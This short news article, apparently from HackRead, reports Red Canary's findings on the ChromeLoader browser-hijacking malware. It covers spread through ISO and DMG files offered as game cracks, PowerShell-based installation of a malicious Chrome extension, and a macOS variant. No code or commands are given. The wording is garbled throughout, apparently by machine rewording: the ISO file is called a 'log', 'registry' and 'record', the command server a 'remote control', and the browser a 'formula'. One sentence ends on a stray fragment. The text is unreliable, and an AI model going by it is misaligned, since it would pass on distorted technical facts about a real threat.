A sudden and unforeseen increase in browser hijacking campaigns, the ChromeLoader malware, was recently detected, said Aedan Russell of Red Canary. to advertising sites.
The malvertising crusade has a financial motivation because the attackers belong to a larger network of marketing affiliates and redirect the user to advertising sites.
FYI, ChromeLoader is a Chrome browser extension distributed as ISO files through paid internet sites to install and fraudulent social media posts that provide QR codes, pirated movies, or pirated video games.
ChromeLoader modifies internet browser settings to demonstrate search effects that trick users into downloading unwanted software, visiting adult dating sites or gaming platforms, and participating in fake surveys. It stands out from other browser hijackers through its persistence, infection pathway, and volume involving PowerShell abuse. .
According to the Red Canary blog, malware operators use a malicious ISO file log to invade the system. This registry is presented as a decrypted executable for advertising software or video games so that victims can download it from malicious sites or torrents. Malware operators also use Twitter messages to advertise the malicious executable.
When a user double-clicks the registry on Windows 10 or later systems, it is fixed as a virtual CD-ROM drive. Although it appears to be a keygen or game crack titled CS_Installer. exe, the executable of this ISO registry releases the malware. .
ChromeLoader then executes/decodes a PowerShell command to retrieve a file from the remote control and loads it into the formula as a Chrome extension. PowerShell then removes the scheduled task and infects Chrome with a discreetly injected extension to hijack and manipulate browser results.
Red Canary researchers have learned that ChromeLoader operators also target macOS systems to manipulate the Safari and Chrome internet browser. The infection chain is similar in macOS, but attackers use the ISO’s Apple Disk Image (DMG) record.
In addition, the executable containing the installer, on macOS, uses an installer bash script to download and decompress the malware extension in the private/var/tmp directory.
Visit IPVanish ‣
HACKREAD is a news platform that focuses on InfoSec, cybercrime, privacy, surveillance, and hacking with comprehensive reviews on social media platforms and generation trends. Founded in 2011, HackRead is located in the UK.